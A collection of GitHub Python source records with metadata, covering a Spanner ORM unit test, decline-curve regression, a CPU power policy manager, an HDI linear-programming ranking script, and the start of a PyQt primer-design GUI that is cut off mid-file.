+{"seq_id": "7593596293", "text": "import logging\nimport unittest\nfrom unittest import mock\n\nfrom spanner_orm import api\nfrom spanner_orm import error\nfrom spanner_orm.admin import api as admin_api\n\n\nclass ApiTest(unittest.TestCase):\n @mock.patch(\"google.cloud.spanner.Client\")\n def test_api_connection(self, client):\n connection = self.mock_connection(client)\n api.connect(\"\", \"\", \"\")\n self.assertEqual(api.spanner_api()._connection, connection)\n\n api.hangup()\n with self.assertRaises(error.SpannerError):\n api.spanner_api()\n\n def test_api_error_when_not_connected(self):\n with self.assertRaises(error.SpannerError):\n api.spanner_api()\n\n @mock.patch(\"google.cloud.spanner.Client\")\n def test_admin_api_connection(self, client):\n connection = self.mock_connection(client)\n admin_api.connect(\"\", \"\", \"\")\n self.assertEqual(admin_api.spanner_admin_api()._connection, connection)\n\n admin_api.hangup()\n with self.assertRaises(error.SpannerError):\n admin_api.spanner_admin_api()\n\n @mock.patch(\"google.cloud.spanner.Client\")\n def test_admin_api_create_ddl_connection(self, client):\n connection = self.mock_connection(client)\n admin_api.connect(\"\", \"\", \"\", create_ddl=[\"create ddl\"])\n self.assertEqual(admin_api.spanner_admin_api()._connection, connection)\n\n def mock_connection(self, client):\n connection = mock.Mock()\n client().instance().database.return_value = connection\n return connection\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n unittest.main()\n", "repo_name": "maroux/python-spanner-orm", "sub_path": "spanner_orm/tests/api_test.py", "file_name": "api_test.py", "file_ext": "py", "file_size_in_byte": 1602, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "spanner_orm.api.connect", "line_number": 14, "usage_type": "call"}, {"api_name": "spanner_orm.api", "line_number": 14, "usage_type": "name"}, {"api_name": "spanner_orm.api.spanner_api", "line_number": 15, "usage_type": "call"}, {"api_name": "spanner_orm.api", "line_number": 15, "usage_type": "name"}, {"api_name": "spanner_orm.api.hangup", "line_number": 17, "usage_type": "call"}, {"api_name": "spanner_orm.api", "line_number": 17, "usage_type": "name"}, {"api_name": "spanner_orm.error.SpannerError", "line_number": 18, "usage_type": "attribute"}, {"api_name": "spanner_orm.error", "line_number": 18, "usage_type": "name"}, {"api_name": "spanner_orm.api.spanner_api", "line_number": 19, "usage_type": "call"}, {"api_name": "spanner_orm.api", "line_number": 19, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 11, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 11, "usage_type": "name"}, {"api_name": "spanner_orm.error.SpannerError", "line_number": 22, "usage_type": "attribute"}, {"api_name": "spanner_orm.error", "line_number": 22, "usage_type": "name"}, {"api_name": "spanner_orm.api.spanner_api", "line_number": 23, "usage_type": "call"}, {"api_name": "spanner_orm.api", "line_number": 23, "usage_type": "name"}, {"api_name": "spanner_orm.admin.api.connect", "line_number": 28, "usage_type": "call"}, {"api_name": "spanner_orm.admin.api", "line_number": 28, "usage_type": "name"}, {"api_name": "spanner_orm.admin.api.spanner_admin_api", "line_number": 29, "usage_type": "call"}, {"api_name": "spanner_orm.admin.api", "line_number": 29, "usage_type": "name"}, {"api_name": "spanner_orm.admin.api.hangup", "line_number": 31, "usage_type": "call"}, {"api_name": "spanner_orm.admin.api", "line_number": 31, "usage_type": "name"}, {"api_name": "spanner_orm.error.SpannerError", "line_number": 32, "usage_type": "attribute"}, {"api_name": "spanner_orm.error", "line_number": 32, "usage_type": "name"}, {"api_name": "spanner_orm.admin.api.spanner_admin_api", "line_number": 33, "usage_type": "call"}, {"api_name": "spanner_orm.admin.api", "line_number": 33, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 25, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 25, "usage_type": "name"}, {"api_name": "spanner_orm.admin.api.connect", "line_number": 38, "usage_type": "call"}, {"api_name": "spanner_orm.admin.api", "line_number": 38, "usage_type": "name"}, {"api_name": "spanner_orm.admin.api.spanner_admin_api", "line_number": 39, "usage_type": "call"}, {"api_name": "spanner_orm.admin.api", "line_number": 39, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 35, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 35, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 42, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 42, "usage_type": "name"}, {"api_name": "logging.basicConfig", "line_number": 48, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "71206786968", "text": "'''\nCreated on 21 de jul de 2017\n\n@author: viniciusgs\n'''\n# Import an utility package for manipulating rate curves\n\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport bisect\nfrom scipy import stats\n\n\ndef ExponentialFit(time_array_in_years, opr_history):\n bissection = SmartIntervalSearcher(opr_history)\n x = time_array_in_years[bissection:]\n y = opr_history.y[bissection:]\n curve_fit_model = lambda x, a, b: a * np.exp(-b * x)\n popt, pcov = curve_fit(curve_fit_model, x, y)\n return popt[1]\n\n\ndef WCFitCoeff(wcut, opt):\n\n if np.sum(wcut) < 0.01:\n slope = 0\n intercept = 0\n else:\n water_break_index = np.argwhere(wcut > 0)[0, 0] # Get the first position where WOR is > 0\n new_wc, new_opt = np.array(wcut[water_break_index:]), np.array(opt[water_break_index:]) * 0.0062898\n slope, intercept, r_value, p_value, slope_std_error = stats.linregress(new_opt, new_wc)\n\n if r_value < 0.99:\n ratio = float(len(new_wc)) / float(len(wcut))\n\n if ratio > 0.1:\n\n if ratio/2 > 0.1:\n ration2_index = water_break_index + int(len(new_wc)/2)\n new_wc, new_opt = np.array(wcut[ration2_index:]), np.array(opt[ration2_index:]) * 0.0062898\n slope, intercept, r_value, p_value, slope_std_error = stats.linregress(new_opt, new_wc)\n\n if r_value < 0.99:\n r90_index = int(0.9 * len(wcut))\n new_wc, new_opt = np.array(wcut[r90_index:]), np.array(opt[r90_index:]) * 0.0062898\n slope, intercept, r_value, p_value, slope_std_error = stats.linregress(new_opt, new_wc)\n\n return slope, intercept\n\n\ndef WORFitCoeff(wor, opt):\n if np.sum(wor) < 0.01:\n popt = np.array([0.0, 0.0])\n\n else:\n position = np.argwhere(wor > 0)[0,0] # Get the first position where WOR is > 0\n opt_cut = np.array(opt[position:]) * 0.0062898\n wor_cut = np.array(wor[position:])\n wor_log = np.log10(wor_cut)\n wor_log_derivative = np.zeros(len(wor_log)-1)\n\n for i in range(len(wor_log_derivative)):\n wor_log_derivative[i] = (wor_log[i+1] - wor_log[i]) / (opt_cut[i+1] - opt_cut[i])\n\n curve_average = np.average(wor_log_derivative)\n curve_std_deviation = np.std(wor_log_derivative)\n\n first_cut_position = 0\n if curve_std_deviation > 0.2*curve_average:\n\n first_cut_position = int(len(wor_log_derivative)/2)\n wor_log_derivative = wor_log_derivative[first_cut_position:]\n curve_average = np.average(wor_log_derivative)\n curve_std_deviation = np.std(wor_log_derivative)\n\n second_cut_position = 0\n if curve_std_deviation > 0.2*curve_average and len(wor_log_derivative) > 0.2*len(wor_log):\n second_cut_position = int(len(wor_log_derivative)/2)\n wor_log_derivative = wor_log_derivative[second_cut_position:]\n curve_average = np.average(wor_log_derivative)\n curve_std_deviation = np.std(wor_log_derivative)\n\n final_position = first_cut_position + second_cut_position\n\n new_opt = opt_cut[final_position:]\n np.putmask(new_opt, np.isinf(new_opt), 0)\n new_wor = wor_log[final_position:]\n np.putmask(new_wor, np.isinf(new_wor), 0)\n\n curve_fit_model = lambda x,a,b: a * x + b\n popt, pcov = curve_fit(curve_fit_model, new_opt, new_wor)\n\n return popt.tolist()\n\n\ndef SmartIntervalSearcher(curve_to_be_analysed):\n new_x_axis = np.empty(len(curve_to_be_analysed.x), dtype = np.datetime64('2015-01-01'))\n derivative = np.zeros(len(curve_to_be_analysed.x))\n\n for i,data in enumerate(curve_to_be_analysed.x):\n new_x_axis[i] = np.datetime64(data.date)\n\n if len(curve_to_be_analysed.x) > 20:\n for i in range(len(curve_to_be_analysed)-1):\n delta = (new_x_axis[i+1] - new_x_axis[i]) / np.timedelta64(1,'D')\n derivative[i] = (curve_to_be_analysed.y[i+1] - curve_to_be_analysed.y[i]) / delta\n\n position = 0\n for i in range(len(derivative)):\n if derivative[-2-i] < 0:\n pass\n else:\n position = len(derivative) - i + 2\n break\n\n if position > 0.9*len(curve_to_be_analysed.x):\n if int(0.9*len(curve_to_be_analysed.x)) < 20:\n position = len(curve_to_be_analysed.x) - 20\n else:\n position = int(0.9*len(curve_to_be_analysed.x))\n else:\n position = 0\n\n return position\n", "repo_name": "ESSS/kraken-macros", "sub_path": "src/macros/dca/dcacore/regression.py", "file_name": "regression.py", "file_ext": "py", "file_size_in_byte": 4575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.exp", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.stats.linregress", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 31, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "scipy.stats.linregress", "line_number": 41, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.stats.linregress", "line_number": 46, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 46, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.putmask", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.putmask", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.datetime64", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.timedelta64", "line_number": 105, "usage_type": "call"}]}
+{"seq_id": "12357274253", "text": "import ddcmpolicy\nimport logging\n\n\nlogger = logging.getLogger('nrm')\n\n\nclass PowerPolicyManager:\n \"\"\" Used for power policy application \"\"\"\n\n def __init__(self, cpus=None, policy=None, damper=1000000000,\n slowdown=1.1):\n self.cpus = cpus\n self.policy = policy\n self.damper = damper\n self.slowdown = slowdown\n\n # Intiliaze all power interfaces\n self.ddcmpolicy = ddcmpolicy.DDCMPolicy()\n\n # Power levels\n self.maxdclevel = self.ddcmpolicy.maxdclevel\n # TODO: Need to set this value when DVFS policies are added\n self.maxfreqlevel = -1\n self.dclevel = dict.fromkeys(self.cpus, self.maxdclevel)\n self.freqlevel = dict.fromkeys(self.cpus, self.maxfreqlevel)\n\n # Book-keeping\n self.damperexits = 0\n self.slowdownexits = 0\n self.prevtolalphasetime = dict.fromkeys(self.cpus, None)\n\n def run_policy(self, phase_contexts):\n # Run only if policy is specified\n if self.policy:\n for id in phase_contexts:\n if id not in self.cpus:\n logger.info(\"\"\"Attempt to change power of cpu not in container\n : %r\"\"\", id)\n return\n # Select and invoke appropriate power policy\n # TODO: Need to add a better policy selection logic in addition\n # to user specified using manifest file\n ret, value = self.execute(id, **phase_contexts[id])\n if self.policy == 'DDCM':\n if ret == 'DDCM':\n self.dclevel[id] = value\n # Incase of slowdown experienced by even process, reset all\n # cpus\n if ret == 'SLOWDOWN':\n self.reset_all()\n phase_contexts[id]['set'] = False\n\n def execute(self, cpu, **kwargs):\n computetime = kwargs['computetime']\n totalphasetime = kwargs['totaltime']\n\n # If the current phase length is less than the damper value, then do\n # not use policy. This avoids use of policy during startup operation\n # insignificant phases\n if totalphasetime < self.damper:\n self.damperexits += 1\n return 'DAMPER', -1\n\n # If the current phase has slowed down beyond the threshold set, then\n # reset power. This helps correct error in policy application or acts\n # as a rudimentary way to detect phase change\n if(self.prevtolalphasetime[cpu] is not None and totalphasetime >\n self.slowdown * self.prevtolalphasetime[cpu]):\n self.ddcmpolicy.dc.reset(cpu)\n newdclevel = self.ddcmpolicy.maxdclevel\n\n # Reset value for next phase\n self.prevtolalphasetime[cpu] = totalphasetime\n\n return 'SLOWDOWN', newdclevel\n\n # Invoke the correct policy based on operation module\n if self.policy == \"DDCM\":\n newdclevel = self.ddcmpolicy.execute(cpu, self.dclevel[cpu],\n computetime, totalphasetime)\n # Reset value for next phase\n self.prevtolalphasetime[cpu] = totalphasetime\n\n # TODO: Add DVFS and Combined policies\n\n return 'DDCM', newdclevel\n\n def print_policy_stats(self, resetflag=False):\n # Get statistics for policy run\n ppstats = dict()\n ppstats['PowerPolicyDamperExits'] = self.damperexits\n ppstats['PowerPolicySlowdownExits'] = self.slowdownexits\n ppstats.update(self.ddcmpolicy.print_stats(resetflag))\n if resetflag:\n self.damperexits = 0\n self.slowdownexits = 0\n\n return ppstats\n\n def power_reset(self, cpu):\n # Reset power control\n self.ddcmpolicy.dc.reset(cpu)\n\n # Reset value\n self.dclevel[cpu] = self.maxdclevel\n\n def power_check(self, cpu):\n # Check status of all power controls\n return self.ddcmpolicy.dc.check(cpu)\n\n def reset_all(self):\n # Reset all cpus\n for cpu in self.cpus:\n self.power_reset(cpu)\n", "repo_name": "anlsys/nrm-legacy", "sub_path": "nrm/powerpolicy.py", "file_name": "powerpolicy.py", "file_ext": "py", "file_size_in_byte": 4145, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "ddcmpolicy.DDCMPolicy", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "27986491672", "text": "import argparse\nimport numpy as np\nimport pandas as pd\nfrom scipy.optimize import linprog\n\n\ndef extract_data(filename: str, preferences: [(str, str), ...]) -> (\n pd.core.frame.DataFrame,\n np.ndarray,\n [(int, int), ...]):\n \"\"\"\n Extracts the needed data here, from the database at http://hdr.undp.org/en/composite/HDI\n Removes the first and last lines that are unrelevant for the study as they contain no actual data.\n Also extracts a matrix of data without counrty names and translates a list of preferences into their\n indices counterparts.\n\n Args\n ----\n filename: str\n the name of the file where the data is located.\n preferences: [(str, str), ...]\n the preferences of the decision makers.\n for instance, the (\"Oman\", \"Brazil\") pair means that Oman is preferred to Brazil.\n\n Returns\n -------\n df: pandas.core.frame.DataFrame\n the whole dataframe of HDI quantities. Education have been computed as the average of\n (a) mean years of schooling for adults aged 25 years and over, and\n (b) expected years for schooling for children of school entering age\n Contains 192 rows, 4 columns and has the following head:\n Country Health Wealth Education\n 0 Norway 82.40 66494.25217 15.481950\n 1 Ireland 82.31 68370.58737 15.685810\n 2 Switzerland 83.78 69393.52076 14.854626\n 3 Hong Kong, China (SAR) 84.86 62984.76553 14.604715\n 4 Iceland 82.99 54682.38057 15.927938\n f: np.ndarray\n the sub matrix with all the fij coefficients in the direct comparisons of a subset\n of alternatives method, i.e. only the Health, Wealth and Education columns in a matrix.\n prefs: [(int, int), ...])\n the list of indices for all the preferences.\n\n \"\"\"\n # extract the data and remove useless lines.\n df = pd.read_excel(filename,\n header=None,\n usecols=\"B,E,G,I,K\",\n skiprows=list(range(8)) + list(range(200, 271)),\n names=[\"Country\", \"Health\", \"Education_exp\", \"Education_curr\", \"Wealth\"])\n\n # replace the education* columns by their mean.\n df[\"Education\"] = (df[\"Education_exp\"] + df[\"Education_curr\"])/2\n df = df.drop(\"Education_curr\", axis=1).drop(\"Education_exp\", axis=1)\n\n # normalize the three criteria between 0 and 1.\n criteria = [\"Health\", \"Education\", \"Wealth\"]\n for crit in criteria:\n df[crit] = (df[crit] - df[crit].min()) / (df[crit].max() - df[crit].min())\n\n # extract the matrix of raw data, called f in the class.\n f = df.iloc[:, 1:].values\n\n # interprets the preferences.\n for i, pref in enumerate(preferences):\n # extract the corresponding indices.\n preferences[i] = (df.index[df[\"Country\"] == pref[0]].tolist()[0],\n df.index[df[\"Country\"] == pref[1]].tolist()[0])\n return df, f, preferences\n\n\ndef prepare_lin_prog(f: np.ndarray, prefs_idx: [(str, str), ...], j: int, t: int, n: int,\n delta: float = 0.1, verbose: bool = False) -> (\n np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, list):\n \"\"\"\n Args\n ----\n f\n prefs\n j\n t\n n\n verbose\n\n Returns\n -------\n c, A_ub, b_ub, A_eq, b_eq, bounds\n \"\"\"\n # n is the total number of variables.\n # minimize their sum with scipy.\n # first j components are the weights corresponding to the j variables.\n # last t components are the errors associated with the preferences.\n c = np.ones(n)\n\n # scipy receives A_ub and b_ub such that, A_ub @ x <= b_ub\n # we need to construct A_ub and b_ub s.t.\n # (f_i0 - f_k0)*w_0 + (f_i1 - f_k1)*w_1 + ... + (f_ij - f_kj)*w_j + e_ik > delta_ik for all i,j s.t. i is prefered to k\n # which coorespond to the line\n # f[prefs_idx[0][0], 0]-f[prefs_idx[0][1], 0], f[prefs_idx[0][0], 1]-f[prefs_idx[0][1], 1], f[prefs_idx[0][0], 2]-f[prefs_idx[0][1], 2], 1, 0, 0, 0, 0, 0, 0, 0\n # because prefs_idx[...][0] is i and prefs_idx[...][1] is k.\n # we also need to invert the matrices because the inequlity is inverted in scipy.\n A_ub = -np.array([\n [f[prefs_idx[0][0], 0]-f[prefs_idx[0][1], 0], f[prefs_idx[0][0], 1]-f[prefs_idx[0][1], 1], f[prefs_idx[0][0], 2]-f[prefs_idx[0][1], 2], 1, 0, 0, 0, 0, 0, 0, 0],\n [f[prefs_idx[1][0], 0]-f[prefs_idx[1][1], 0], f[prefs_idx[1][0], 1]-f[prefs_idx[1][1], 1], f[prefs_idx[1][0], 2]-f[prefs_idx[1][1], 2], 0, 1, 0, 0, 0, 0, 0, 0],\n [f[prefs_idx[2][0], 0]-f[prefs_idx[2][1], 0], f[prefs_idx[2][0], 1]-f[prefs_idx[2][1], 1], f[prefs_idx[2][0], 2]-f[prefs_idx[2][1], 2], 0, 0, 1, 0, 0, 0, 0, 0],\n [f[prefs_idx[3][0], 0]-f[prefs_idx[3][1], 0], f[prefs_idx[3][0], 1]-f[prefs_idx[3][1], 1], f[prefs_idx[3][0], 2]-f[prefs_idx[3][1], 2], 0, 0, 0, 1, 0, 0, 0, 0],\n [f[prefs_idx[4][0], 0]-f[prefs_idx[4][1], 0], f[prefs_idx[4][0], 1]-f[prefs_idx[4][1], 1], f[prefs_idx[4][0], 2]-f[prefs_idx[4][1], 2], 0, 0, 0, 0, 1, 0, 0, 0],\n [f[prefs_idx[5][0], 0]-f[prefs_idx[5][1], 0], f[prefs_idx[5][0], 1]-f[prefs_idx[5][1], 1], f[prefs_idx[5][0], 2]-f[prefs_idx[5][1], 2], 0, 0, 0, 0, 0, 1, 0, 0],\n [f[prefs_idx[6][0], 0]-f[prefs_idx[6][1], 0], f[prefs_idx[6][0], 1]-f[prefs_idx[6][1], 1], f[prefs_idx[6][0], 2]-f[prefs_idx[6][1], 2], 0, 0, 0, 0, 0, 0, 1, 0],\n [f[prefs_idx[7][0], 0]-f[prefs_idx[7][1], 0], f[prefs_idx[7][0], 1]-f[prefs_idx[7][1], 1], f[prefs_idx[7][0], 2]-f[prefs_idx[7][1], 2], 0, 0, 0, 0, 0, 0, 0, 1]\n ])\n b_ub = -np.ones(t) * delta\n\n # scipy receives A_eq and b_eq such that, A_eq @ x == b_eq\n # we want that the weights sum to 1.\n A_eq = np.concatenate((\n np.ones((j, 1)), \n np.zeros((t, 1)))).transpose()\n b_eq = np.ones(1)\n\n # all errors e_ik and weights w_j are positive.\n bounds = [(0, None)] * n\n\n if verbose:\n print(c, c.shape)\n print(A_ub, A_ub.shape, b_ub, b_ub.shape)\n print(A_eq, A_eq.shape, b_eq, b_eq.shape)\n print(bounds)\n\n return c, A_ub, b_ub, A_eq, b_eq, bounds\n\n\ndef main(filename, delta, verbose=False):\n # extract all the data.\n preferences = [(\"Oman\", \"Brazil\"), (\"Ireland\", \"Portugal\"),\n (\"Turkey\", \"Ukraine\"), (\"Zimbabwe\", \"Haiti\"),\n (\"Japan\", \"Estonia\"), (\"Algeria\", \"Panama\"),\n (\"Kenya\", \"India\"), (\"Peru\", \"Romania\")]\n df, f, prefs = extract_data(filename, preferences)\n\n t = len(prefs)\n j = f.shape[1]\n n = t + j\n\n # get everything for solving time.\n c, A_ub, b_ub, A_eq, b_eq, bounds = prepare_lin_prog(f, prefs, j, t, n, delta=delta, verbose=verbose)\n\n # solve the problem.\n res = linprog(c, A_ub=A_ub, b_ub=b_ub, A_eq=A_eq, b_eq=b_eq, bounds=bounds)\n if verbose:\n print(res)\n w = res.x[:3]\n print(f\"weights found: {w}\")\n if verbose:\n print(f\"sum of weights: {np.sum(w)}, sum of errors: {np.sum(res.x[3:])}\")\n print()\n\n # scores and ranking according to the direct comparisons method.\n scores = np.dot(f, w)\n ranks = np.argsort(scores)\n ranking = [df[\"Country\"][r] for r in ranks]\n if verbose:\n print(\"scores:\", scores)\n print(\"ranks:\", ranks)\n print(\"ranking:\", ranking)\n print()\n\n for i, k in preferences:\n print(f\"{scores[i]: 5.4f}, {scores[k]: 5.4f}\", \"inconsistent\" if scores[i] <= scores[k] else \"consistent\")\n print()\n\n # questions 4.\n canada = df[df[\"Country\"] == \"Canada\"].index\n print(\"canada:\", ranks[canada][0])\n\n df[\"HDI\"] = (df[\"Health\"] * df[\"Education\"] * df[\"Wealth\"]) ** (1/3)\n sorted_df = df.sort_values(\"HDI\")\n hdi_canada = df[\"HDI\"][df[\"Country\"] == \"Canada\"].values[0]\n hdis = sorted_df[\"HDI\"].values[:-3][::-1]\n if verbose:\n print()\n print(\"hdis:\", hdis)\n print(\"hdi of canada:\", hdi_canada)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", type=str, default=\"2020_Statistical_Annex_Table_1.xlsx\",\n help=\"The path to the excel file (defaults to '2020_Statistical_Annex_Table_1.xlsx').\")\n parser.add_argument(\"-d\", \"--delta\", type=float, default=0.1,\n help=\"The value of all the right hand side of the equations for the direct method (defaults to 0.1).\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"Triggers the full verbose if raised.\")\n args = parser.parse_args()\n main(args.input, args.delta, args.verbose)\n", "repo_name": "amtoine/mcdm", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8908, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_excel", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 72, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 74, "usage_type": "attribute"}, {"api_name": "scipy.optimize.linprog", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 160, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 187, "usage_type": "call"}]}
+{"seq_id": "720210428", "text": "import sys\n\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import QSize\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QMainWindow, QMessageBox, QLabel, QGridLayout, QWidget, qApp, QAction, QGroupBox, \\\n QHBoxLayout, QVBoxLayout, QListWidget, QLineEdit, QPushButton, QTabWidget, QTableWidget, QTableWidgetItem, \\\n QTextEdit\nfrom PyQt5.QtWidgets import QSpinBox\n\nfrom main.aho_korasick.search import AhoKorasickSearch\nfrom main.aho_korasick_wildcard.wildcard_search import AhoKorasickWildcard\n# from main.bitap_search.pattern import Pattern\nfrom main.bitap_search.custom_bitap import CustomBitapSearch\nfrom main.utils.enzymes_reader import EnzymesReader\n\n\n# Наследуемся от QMainWindow\nfrom main.utils.search_results_helper import TransformationHelper\n\n\nclass MainWindow(QMainWindow):\n # Переопределяем конструктор класса\n IMAGES_PATH = 'resources/static/images/'\n\n def __init__(self):\n # Обязательно нужно вызвать метод супер класса\n super().__init__()\n self.tabs = QTabWidget()\n self.seq_line_edit = QTextEdit()\n self.table_widget = QTableWidget()\n self.mutationPosition = QSpinBox(self)\n self.enzymes_reader = EnzymesReader()\n self.search_engine = AhoKorasickSearch(self.enzymes_reader.get_sib_simple_patterns(),\n self.enzymes_reader.get_neb_simple_pattens())\n self.search_engine_wildcard = AhoKorasickWildcard(self.enzymes_reader.get_sib_wildcard_patterns(),\n self.enzymes_reader.get_neb_wildcard_patterns())\n # p1 = Pattern('GAA', ['name1', 'name11'])\n # p2 = Pattern('NCCT', ['name2'])\n # p3 = Pattern('TAAG', ['name3'])\n # p4 = Pattern('GTG', ['name4'])\n # pats = [p1, p2, p3, p4]\n self.build_primers_engine = CustomBitapSearch(self.enzymes_reader.get_all_sib_patterns(), 2)\n self.build_primers_engine_neb = CustomBitapSearch(self.enzymes_reader.get_all_neb_patterns(), 2)\n self.init_ui()\n\n def init_ui(self):\n self.setMinimumSize(QSize(480, 320)) # Устанавливаем размеры\n self.setWindowTitle(\"Mutagenesis primer designer\") # Устанавливаем заголовок окна\n self.setWindowIcon(QIcon(self.IMAGES_PATH + 'main.png'))\n self.statusBar().showMessage('Ready to start work')\n central_widget = QWidget(self) # Создаём центральный виджет\n self.setCentralWidget(central_widget) # Устанавливаем центральный виджет\n\n self.init_menu()\n self.create_tool_bar()\n\n main_layout = QHBoxLayout(self)\n central_widget.setLayout(main_layout)\n\n # self.tabs = QTabWidget()\n tab_neb = QWidget()\n tab_sib = QWidget()\n # Add tabs\n self.tabs.addTab(tab_neb, \"NEB\")\n self.tabs.addTab(tab_sib, \"SibEnzymes\")\n\n # Create first, second tab\n # TODO: use getters\n self.create_enzymes_list(tab_neb, self.enzymes_reader.get_neb_enzymes_data())\n self.create_enzymes_list(tab_sib, self.enzymes_reader.get_sib_enzymes_data())\n # Add tabs to widget\n main_layout.addWidget(self.tabs, 1)\n\n # Create font\n font_9_pt = QtGui.QFont()\n font_9_pt.setPointSizeF(9)\n\n right_widget = QWidget()\n right_layout = QVBoxLayout()\n seq_group_box = QGroupBox(\"Enter a sequence:\")\n seq_group_box.setFont(font_9_pt)\n seq_layout = QHBoxLayout()\n self.seq_line_edit.cursorPositionChanged.connect(self.cursor_position)\n seq_layout.addWidget(self.seq_line_edit)\n # seq_grid_layout = QGridLayout()\n # seq_grid_layout.setSpacing(10)\n # seq_label = QLabel(\"Enter a sequence:\")\n # #seq_line_edit = QLineEdit()\n # seq_line_edit = QTextEdit()\n # seq_search_button = QPushButton(\"Search\")\n # primer_label = QLabel(\"Primer:\")\n # # primer_label.setFont(font_11_pt)\n # primer_label_1 = QLabel(\"\")\n # build_primer_button = QPushButton(\"Build Primer\")\n # seq_grid_layout.addWidget(seq_label, 0, 0)\n # seq_grid_layout.addWidget(seq_line_edit, 0, 1, 2, 1)\n # seq_grid_layout.addWidget(seq_search_button, 0, 2)\n # seq_grid_layout.addWidget(primer_label, 2, 0)\n # seq_grid_layout.addWidget(primer_label_1, 1, 1)\n # seq_grid_layout.addWidget(build_primer_button, 1, 2)\n # seq_group_box.setLayout(seq_grid_layout)\n\n seq_group_box.setLayout(seq_layout)\n right_layout.addWidget(seq_group_box, 1)\n\n right_layout.addWidget(self.table_widget, 4)\n\n right_widget.setLayout(right_layout)\n\n main_layout.addWidget(right_widget, 3)\n\n def init_menu(self):\n # Создаём Action с помощью которого будем выходить из приложения\n exit_action = QAction(QIcon(self.IMAGES_PATH + 'exit.png'), \"&Exit\", self)\n exit_action.setShortcut('Ctrl+Q') # Задаём для него хоткей\n exit_action.setStatusTip('Exit application')\n # Подключаем сигнал triggered к слоту quit у qApp.\n # синтаксис сигналов и слотов в PyQt5 заметно отличается от того,\n # который используется Qt5 C++\n 